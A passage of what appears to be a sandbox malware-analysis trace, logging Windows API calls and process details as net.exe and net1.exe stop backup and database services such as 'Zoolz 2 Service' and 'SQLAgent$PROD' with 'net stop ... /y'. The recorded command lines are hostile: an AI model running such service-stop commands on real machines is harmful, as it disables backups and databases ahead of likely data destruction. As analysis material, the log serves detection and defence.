_wcsicmp (_String1="share", _String2="Zoolz 2 Service") returned -7 [0122.967] _wcsicmp (_String1="start", _String2="Zoolz 2 Service") returned -7 [0122.967] _wcsicmp (_String1="stats", _String2="Zoolz 2 Service") returned -7 [0122.967] _wcsicmp (_String1="statistics", _String2="Zoolz 2 Service") returned -7 [0122.967] _wcsicmp (_String1="stop", _String2="Zoolz 2 Service") returned -7 [0122.967] _wcsicmp (_String1="time", _String2="Zoolz 2 Service") returned -6 [0122.967] _wcsicmp (_String1="user", _String2="Zoolz 2 Service") returned -5 [0122.967] _wcsicmp (_String1="users", _String2="Zoolz 2 Service") returned -5 [0122.967] _wcsicmp (_String1="msg", _String2="Zoolz 2 Service") returned -13 [0122.967] _wcsicmp (_String1="messenger", _String2="Zoolz 2 Service") returned -13 [0122.967] _wcsicmp (_String1="receiver", _String2="Zoolz 2 Service") returned -8 [0122.967] _wcsicmp (_String1="rcv", _String2="Zoolz 2 Service") returned -8 [0122.967] _wcsicmp (_String1="netpopup", _String2="Zoolz 2 Service") returned -12 [0122.967] _wcsicmp (_String1="redirector", _String2="Zoolz 2 Service") returned -8 [0122.967] _wcsicmp (_String1="redir", _String2="Zoolz 2 Service") returned -8 [0122.967] _wcsicmp (_String1="rdr", _String2="Zoolz 2 Service") returned -8 [0122.967] _wcsicmp (_String1="workstation", _String2="Zoolz 2 Service") returned -3 [0122.967] _wcsicmp (_String1="work", _String2="Zoolz 2 Service") returned -3 [0122.967] _wcsicmp (_String1="wksta", _String2="Zoolz 2 Service") returned -3 [0122.967] _wcsicmp (_String1="prdr", _String2="Zoolz 2 Service") returned -10 [0122.967] _wcsicmp (_String1="devrdr", _String2="Zoolz 2 Service") returned -22 [0122.967] _wcsicmp (_String1="lanmanworkstation", _String2="Zoolz 2 Service") returned -14 [0122.967] _wcsicmp (_String1="server", _String2="Zoolz 2 Service") returned -7 [0122.967] _wcsicmp (_String1="svr", _String2="Zoolz 2 Service") returned -7 [0122.967] _wcsicmp (_String1="srv", _String2="Zoolz 2 Service") returned -7 [0122.967] _wcsicmp (_String1="lanmanserver", _String2="Zoolz 2 Service") returned -14 [0122.967] _wcsicmp (_String1="alerter", _String2="Zoolz 2 Service") returned -25 [0122.967] _wcsicmp (_String1="netlogon", _String2="Zoolz 2 Service") returned -12 [0122.967] _wcsupr (in: _String="Zoolz 2 Service" | out: _String="ZOOLZ 2 SERVICE") returned="ZOOLZ 2 SERVICE" [0122.968] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x39ce30 [0123.043] GetServiceKeyNameW (in: hSCManager=0x39ce30, lpDisplayName="ZOOLZ 2 SERVICE", lpServiceName=0xffb35750, lpcchBuffer=0x24f6e8 | out: lpServiceName="", lpcchBuffer=0x24f6e8) returned 0 [0123.045] _wcsicmp (_String1="msg", _String2="ZOOLZ 2 SERVICE") returned -13 [0123.045] _wcsicmp (_String1="messenger", _String2="ZOOLZ 2 SERVICE") returned -13 [0123.045] _wcsicmp (_String1="receiver", _String2="ZOOLZ 2 SERVICE") returned -8 [0123.045] _wcsicmp (_String1="rcv", _String2="ZOOLZ 2 SERVICE") returned -8 [0123.045] _wcsicmp (_String1="redirector", _String2="ZOOLZ 2 SERVICE") returned -8 [0123.045] _wcsicmp (_String1="redir", _String2="ZOOLZ 2 SERVICE") returned -8 [0123.045] _wcsicmp (_String1="rdr", _String2="ZOOLZ 2 SERVICE") returned -8 [0123.045] _wcsicmp (_String1="workstation", _String2="ZOOLZ 2 SERVICE") returned -3 [0123.045] _wcsicmp (_String1="work", _String2="ZOOLZ 2 SERVICE") returned -3 [0123.045] _wcsicmp (_String1="wksta", _String2="ZOOLZ 2 SERVICE") returned -3 [0123.045] _wcsicmp (_String1="prdr", _String2="ZOOLZ 2 SERVICE") returned -10 [0123.045] _wcsicmp (_String1="devrdr", _String2="ZOOLZ 2 SERVICE") returned -22 [0123.045] _wcsicmp (_String1="lanmanworkstation", _String2="ZOOLZ 2 SERVICE") returned -14 [0123.045] _wcsicmp (_String1="server", _String2="ZOOLZ 2 SERVICE") returned -7 [0123.045] _wcsicmp (_String1="svr", _String2="ZOOLZ 2 SERVICE") returned -7 [0123.045] _wcsicmp (_String1="srv", _String2="ZOOLZ 2 SERVICE") returned -7 [0123.045] _wcsicmp (_String1="lanmanserver", _String2="ZOOLZ 2 SERVICE") returned -14 [0123.045] _wcsicmp (_String1="alerter", _String2="ZOOLZ 2 SERVICE") returned -25 [0123.045] _wcsicmp (_String1="netlogon", _String2="ZOOLZ 2 SERVICE") returned -12 [0123.045] NetServiceControl (in: servername=0x0, service="ZOOLZ 2 SERVICE", opcode=0x0, arg=0x0, bufptr=0x24f6f0 | out: bufptr=0x24f6f0) returned 0x889 [0123.046] wcscpy_s (in: _Destination=0xffb380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0123.046] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0123.047] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0123.048] GetFileType (hFile=0xb) returned 0x2 [0123.048] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f5b8 | out: lpMode=0x24f5b8) returned 1 [0123.048] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f5b0, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x24f5b0*=0x1e) returned 1 [0123.048] GetFileType (hFile=0xb) returned 0x2 [0123.049] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f5b8 | out: lpMode=0x24f5b8) returned 1 [0123.049] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f5b0, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x24f5b0*=0x2) returned 1 [0123.049] _ultow (in: _Dest=0x889, _Radix=2422304 | out: _Dest=0x889) returned="2185" [0123.049] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0123.049] GetFileType (hFile=0xb) returned 0x2 [0123.049] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f5b8 | out: lpMode=0x24f5b8) returned 1 [0123.050] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f5b0, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x24f5b0*=0x34) returned 1 [0123.050] GetFileType (hFile=0xb) returned 0x2 [0123.050] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f5b8 | out: lpMode=0x24f5b8) returned 1 [0123.050] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f5b0, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x24f5b0*=0x2) returned 1 [0123.050] NetApiBufferFree (Buffer=0x394d60) returned 0x0 [0123.051] NetApiBufferFree (Buffer=0x39c120) returned 0x0 [0123.051] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Zoolz 2 Service\" /y" [0123.051] exit (_Code=2) Process: id = "385" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x732a8000" os_pid = "0xdb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop EhttpSrv /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13405 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13406 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13407 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13408 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 13409 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13410 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13411 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13412 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13413 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13414 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13415 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13416 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 13617 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13618 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 13619 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13620 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13621 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13622 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13623 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 935 os_tid = 0x344 Process: id = "386" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5eea1000" os_pid = "0x1148" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "379" os_parent_pid = "0xd04" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$PROD /y " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13417 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13418 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13419 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13420 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13421 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13422 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13423 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13424 start_va = 0xffb10000 end_va = 0xffb42fff entry_point = 0xffb10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13425 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13426 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13427 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 13428 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13644 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13645 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13646 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 13647 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13648 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13649 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13650 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13679 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13680 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 13681 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 13682 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13683 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13684 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13685 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13686 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13687 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13688 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13689 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13690 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13691 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13692 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13693 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13694 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13695 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13696 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13697 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13774 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 937 os_tid = 0xd54 [0122.933] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f9f0 | out: lpSystemTimeAsFileTime=0x28f9f0*(dwLowDateTime=0xfe65f010, dwHighDateTime=0x1d48689)) [0122.933] GetCurrentProcessId () returned 0x1148 [0122.933] GetCurrentThreadId () returned 0xd54 [0122.933] GetTickCount () returned 0x285d1 [0122.933] QueryPerformanceCounter (in: lpPerformanceCount=0x28f9f8 | out: lpPerformanceCount=0x28f9f8*=1816985100000) returned 1 [0122.933] GetModuleHandleW (lpModuleName=0x0) returned 0xffb10000 [0122.933] __set_app_type (_Type=0x1) [0122.934] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb29c9c) returned 0x0 [0122.934] __getmainargs (in: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788, _DoWildCard=0, _StartInfo=0xffb3479c | out: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788) returned 0 [0122.934] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0122.934] GetConsoleOutputCP () returned 0x1b5 [0122.934] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb3cec0 | out: lpCPInfo=0xffb3cec0) returned 1 [0122.934] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0122.936] sprintf_s (in: _DstBuf=0x28f998, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0122.936] setlocale (category=0, locale=".437") returned="English_United States.437" [0122.937] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0122.937] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0122.937] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PROD /y " [0122.937] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f730, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0122.937] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0122.937] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28f988 | out: Buffer=0x28f988*=0x3e4d50) returned 0x0 [0122.937] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28f988 | out: Buffer=0x28f988*=0x3ec100) returned 0x0 [0122.937] _fileno (_File=0x7fefdba2a80) returned 0 [0122.937] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0122.938] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0122.938] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0122.938] _wcsicmp (_String1="config", _String2="stop") returned -16 [0122.938] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0122.938] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0122.938] _wcsicmp (_String1="file", _String2="stop") returned -13 [0122.938] _wcsicmp (_String1="files", _String2="stop") returned -13 [0122.938] _wcsicmp (_String1="group", _String2="stop") returned -12 [0122.938] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0122.938] _wcsicmp (_String1="help", _String2="stop") returned -11 [0122.938] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0122.938] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0122.938] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0122.938] _wcsicmp (_String1="session", _String2="stop") returned -15 [0122.938] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0122.938] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0122.938] _wcsicmp (_String1="share", _String2="stop") returned -12 [0122.938] _wcsicmp (_String1="start", _String2="stop") returned -14 [0122.938] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0122.938] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0122.938] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0122.938] _wcsicmp (_String1="accounts", _String2="SQLAgent$PROD") returned -18 [0122.938] _wcsicmp (_String1="computer", _String2="SQLAgent$PROD") returned -16 [0122.938] _wcsicmp (_String1="config", _String2="SQLAgent$PROD") returned -16 [0122.938] _wcsicmp (_String1="continue", _String2="SQLAgent$PROD") returned -16 [0122.938] _wcsicmp (_String1="cont", _String2="SQLAgent$PROD") returned -16 [0122.938] _wcsicmp (_String1="file", _String2="SQLAgent$PROD") returned -13 [0122.938] _wcsicmp (_String1="files", _String2="SQLAgent$PROD") returned -13 [0122.938] _wcsicmp (_String1="group", _String2="SQLAgent$PROD") returned -12 [0122.938] _wcsicmp (_String1="groups", _String2="SQLAgent$PROD") returned -12 [0122.938] _wcsicmp (_String1="help", _String2="SQLAgent$PROD") returned -11 [0122.938] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$PROD") returned -11 [0122.938] _wcsicmp (_String1="localgroup", _String2="SQLAgent$PROD") returned -7 [0122.938] _wcsicmp (_String1="pause", _String2="SQLAgent$PROD") returned -3 [0122.938] _wcsicmp (_String1="session", _String2="SQLAgent$PROD") returned -12 [0122.938] _wcsicmp (_String1="sessions", _String2="SQLAgent$PROD") returned -12 [0122.938] _wcsicmp (_String1="sess", _String2="SQLAgent$PROD") returned -12 [0122.938] _wcsicmp (_String1="share", _String2="SQLAgent$PROD") returned -9 [0122.938] _wcsicmp (_String1="start", _String2="SQLAgent$PROD") returned 3 [0122.938] _wcsicmp (_String1="stats", _String2="SQLAgent$PROD") returned 3 [0122.938] _wcsicmp (_String1="statistics", _String2="SQLAgent$PROD") returned 3 [0122.939] _wcsicmp (_String1="stop", _String2="SQLAgent$PROD") returned 3 [0122.939] _wcsicmp (_String1="time", _String2="SQLAgent$PROD") returned 1 [0122.939] _wcsicmp (_String1="user", _String2="SQLAgent$PROD") returned 2 [0122.939] _wcsicmp (_String1="users", _String2="SQLAgent$PROD") returned 2 [0122.939] _wcsicmp (_String1="msg", _String2="SQLAgent$PROD") returned -6 [0122.939] _wcsicmp (_String1="messenger", _String2="SQLAgent$PROD") returned -6 [0122.939] _wcsicmp (_String1="receiver", _String2="SQLAgent$PROD") returned -1 [0122.939] _wcsicmp (_String1="rcv", _String2="SQLAgent$PROD") returned -1 [0122.939] _wcsicmp (_String1="netpopup", _String2="SQLAgent$PROD") returned -5 [0122.939] _wcsicmp (_String1="redirector", _String2="SQLAgent$PROD") returned -1 [0122.939] _wcsicmp (_String1="redir", _String2="SQLAgent$PROD") returned -1 [0122.939] _wcsicmp (_String1="rdr", _String2="SQLAgent$PROD") returned -1 [0122.939] _wcsicmp (_String1="workstation", _String2="SQLAgent$PROD") returned 4 [0122.939] _wcsicmp (_String1="work", _String2="SQLAgent$PROD") returned 4 [0122.939] _wcsicmp (_String1="wksta", _String2="SQLAgent$PROD") returned 4 [0122.939] _wcsicmp (_String1="prdr", _String2="SQLAgent$PROD") returned -3 [0122.939] _wcsicmp (_String1="devrdr", _String2="SQLAgent$PROD") returned -15 [0122.939] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$PROD") returned -7 [0122.939] _wcsicmp (_String1="server", _String2="SQLAgent$PROD") returned -12 [0122.939] _wcsicmp (_String1="svr", _String2="SQLAgent$PROD") returned 5 [0122.939] _wcsicmp (_String1="srv", _String2="SQLAgent$PROD") returned 1 [0122.939] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$PROD") returned -7 [0122.939] _wcsicmp (_String1="alerter", _String2="SQLAgent$PROD") returned -18 [0122.939] _wcsicmp (_String1="netlogon", _String2="SQLAgent$PROD") returned -5 [0122.939] _wcsupr (in: _String="SQLAgent$PROD" | out: _String="SQLAGENT$PROD") returned="SQLAGENT$PROD" [0122.939] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3ece10 [0122.971] GetServiceKeyNameW (in: hSCManager=0x3ece10, lpDisplayName="SQLAGENT$PROD", lpServiceName=0xffb35750, lpcchBuffer=0x28f8a8 | out: lpServiceName="", lpcchBuffer=0x28f8a8) returned 0 [0122.984] _wcsicmp (_String1="msg", _String2="SQLAGENT$PROD") returned -6 [0122.984] _wcsicmp (_String1="messenger", _String2="SQLAGENT$PROD") returned -6 [0122.984] _wcsicmp (_String1="receiver", _String2="SQLAGENT$PROD") returned -1 [0122.984] _wcsicmp (_String1="rcv", _String2="SQLAGENT$PROD") returned -1 [0122.984] _wcsicmp (_String1="redirector", _String2="SQLAGENT$PROD") returned -1 [0122.984] _wcsicmp (_String1="redir", _String2="SQLAGENT$PROD") returned -1 [0122.984] _wcsicmp (_String1="rdr", _String2="SQLAGENT$PROD") returned -1 [0122.984] _wcsicmp (_String1="workstation", _String2="SQLAGENT$PROD") returned 4 [0122.984] _wcsicmp (_String1="work", _String2="SQLAGENT$PROD") returned 4 [0122.984] _wcsicmp (_String1="wksta", _String2="SQLAGENT$PROD") returned 4 [0122.984] _wcsicmp (_String1="prdr", _String2="SQLAGENT$PROD") returned -3 [0122.984] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$PROD") returned -15 [0122.984] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$PROD") 